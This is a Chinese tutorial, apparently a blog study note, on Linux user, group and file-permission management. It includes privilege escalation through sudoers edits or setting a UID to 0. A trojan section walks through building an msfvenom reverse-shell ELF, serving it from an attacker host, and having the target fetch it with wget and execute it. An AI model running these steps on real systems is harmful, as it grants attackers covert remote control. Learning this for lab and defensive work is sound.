Linux 安全基础(二)
本文仅用于网络安全学习、防御加固与合法渗透测试,所有操作仅限在靶机或已获得书面授权的环境中进行。严禁用于非法攻击、入侵、数据窃取等违法犯罪行为,否则后果自负。
一、Linux 用户与组管理
1.1 /etc/passwd 文件解析
/etc/passwd是系统用户基本信息配置文件,每行对应一个用户,格式如下:
用户名:密码占位符(x):用户ID(UID):组ID(GID):用户说明:用户主目录:命令解释器示例:
root:x:0:0:root:/root:/usr/bin/zsh1.2 用户分类
| 用户类型 | UID 范围 | 说明 |
|---|---|---|
| root 用户 | 0 | 系统最高权限用户 |
| 系统用户 | 1-999 | 用于服务进程运行,无登录权限 |
| 普通用户 | ≥1000 | 手动创建的可登录用户 |
1.3 组的概念
- 主组(Primary Group):用户创建文件时默认归属的组
- 附加组(Supplementary Group):用户可加入的额外权限组
- 查看所有组:
cat /etc/group
1.4 常用用户操作命令
(1)新建用户
# -m 自动创建用户主目录useradd-m用户名(2)设置用户密码
passwd用户名linux系统中密码密文存放的文件:
/etc/shadow
(3)修改用户所属组
# -a 追加,-G 指定附加组usermod-aG组名 用户名# 示例:将用户123添加到sudo组usermod-aGsudo1231.5 普通用户提权
方式1:添加到sudo组(推荐)
# 查看组文件cat/etc/group# 查询用户是否在sudo组grepsudo/etc/group#输出例子:sudo:x:27:user1,user2# 将用户加入sudo组usermod-aGsudo用户名方式2:修改/etc/sudoers文件
# 编辑sudoers文件(使用nano避免语法错误)nano/etc/sudoers# 添加如下配置(赋予用户全部sudo权限)用户名ALL=(ALL:ALL)ALL# 赋予整个组sudo权限(示例)%sudoALL=(ALL:ALL)ALL方式3:修改UID为0(不推荐,等同于root)
# 编辑/etc/passwd文件nano/etc/passwd# 将普通用户行修改为(替换为实际用户名)用户名:x:0:0:root:/root:/usr/bin/zsh二、Linux 文件权限管理
2.1 查看文件权限
# 查看文件/目录详细权限信息ls-l文件名 ll 文件名# 等同于ls -l2.2 权限表示规则(10位字符)
示例:-rwxr-xr--表示:普通文件、所有者有读写执行权限、所属组有读执行权限、其他用户仅读权限
| 位置 | 含义 | 示例值 |
|---|---|---|
| 第1位 | 文件类型 | -(普通文件)、d(目录)、l(软链接)、b(块设备)、c(字符设备)、s(socket)、p(管道 ) |
| 2-4位 | 所有者权限(u) | rwx(读、写、执行) |
| 5-7位 | 所属组权限(g) | r-x(读、执行) |
| 8-10位 | 其他用户权限(o) | r--(仅读) |
2.3 权限数字表示法
核心规则:r=4、w=2、x=1,权限值为对应数字之和
| 权限组合 | 数字值 | 说明 |
|---|---|---|
| rwx | 7 | 读+写+执行 |
| r-x | 5 | 读+执行 |
| r– | 4 | 仅读 |
| — | 0 | 无权限 |
2.4 修改文件权限(chmod)
# 方式1:符号表示法chmodu=rwx,g=rx,o=rx 文件名# 设置所有者rwx、所属组rx、其他rxchmodu+w test.txt# 给所有者添加写权限chmodg-x test.txt# 取消所属组执行权限chmodo=r test.txt# 给其他用户设置仅读权限# 方式2:数字表示法chmod755test.txt# 所有者rwx、所属组rx、其他rxchmod-R777/home/test# 递归设置目录及子文件全部权限(慎用)2.5 修改文件所有者/所属组(chown)
# 修改文件所有者和所属组chown用户名:用户组 文件名# 示例:将test文件所有者改为user1,所属组改为user1chownuser1:user1test三、木马
重要提醒!!!严禁用于非法攻击、入侵、数据窃取等违法犯罪行为,所有操作仅限在靶机或已获得书面授权的环境中进行。否则后果自负。
3.1 木马核心概念
- 定义:伪装成合法软件、隐蔽运行在目标设备中,用于长期控制或窃取数据的恶意程序
- 关键特征:伪装性、隐蔽性
- 危害:设备沦为“肉鸡”,攻击者可远程执行任意操作
- 区别于合法远程工具:向日葵/TeamViewer等工具需用户知情并授权,木马则是隐蔽控制
3.2 攻击方式(基于Kali Linux MSF框架)
(1)制作木马程序
# 生成Linux x64反向连接木马# LHOST:攻击机(Kali)IP,LPORT:监听端口,-f:输出格式,-o:输出文件msfvenom-plinux/x64/shell/reverse_tcpLHOST=攻击机IPLPORT=9999-felf-oshell.elf(2)启动MSF监听程序
# 进入MSF控制台msfconsole# 配置监听模块use exploit/multi/handlersetpayload linux/x64/shell/reverse_tcpsetlhost 攻击机IPsetlport9999# 启动监听run(3)植入并启动木马
步骤1:木马文件传输到靶机
# 将木马移动到Apache根目录mvshell.elf /var/www/html# 启动Apache服务serviceapache2 start步骤2:目标靶机下载并执行木马
# 从Kali下载木马文件wgethttp://攻击机IP/shell.elf-Oshell.elf# 添加执行权限(解决权限拒绝问题)chmod+x shell.elf# 启动木马(后台运行避免退出终端后停止)./shell.elf&四、总结
- 用户权限核心:root用户UID为0拥有最高权限,普通用户可通过加入sudo组或修改sudoers文件提权,文件权限可通过chmod(修改权限)、chown(修改属主)管理。
- 权限数字规则:r=4、w=2、x=1,权限组合值为数字之和,755表示所有者rwx、所属组和其他rx,777为全部权限(慎用)。
- 木马攻击流程:MSF生成反向连接木马 → 启动MSF监听 → 目标机下载并执行木马,可通过开机自启、服务常驻等方式实现持久化控制。
五、 重要声明
本文为学习笔记整理,如有错误或不足,欢迎大家在评论区指正交流,一起进步!
本文所涉及的网络攻击、渗透测试、漏洞验证、流量分析等技术内容,仅限在合法授权的私有靶场、实验环境、教学平台内进行学习与研究。
严禁将任何攻击手段、工具、思路用于未获得明确书面授权的真实网站、服务器、网络设备及个人设备。未经许可对他人系统、网络、数据进行扫描、入侵、破坏、窃取或干扰,均属于违法行为。
一切测试与学习行为必须严格遵守《中华人民共和国网络安全法》《中华人民共和国刑法》《中华人民共和国数据安全法》等相关法律法规,恪守网络安全职业道德与底线。坚守白帽底线,维护网络空间安全,做合法合规的安全从业者与学习者。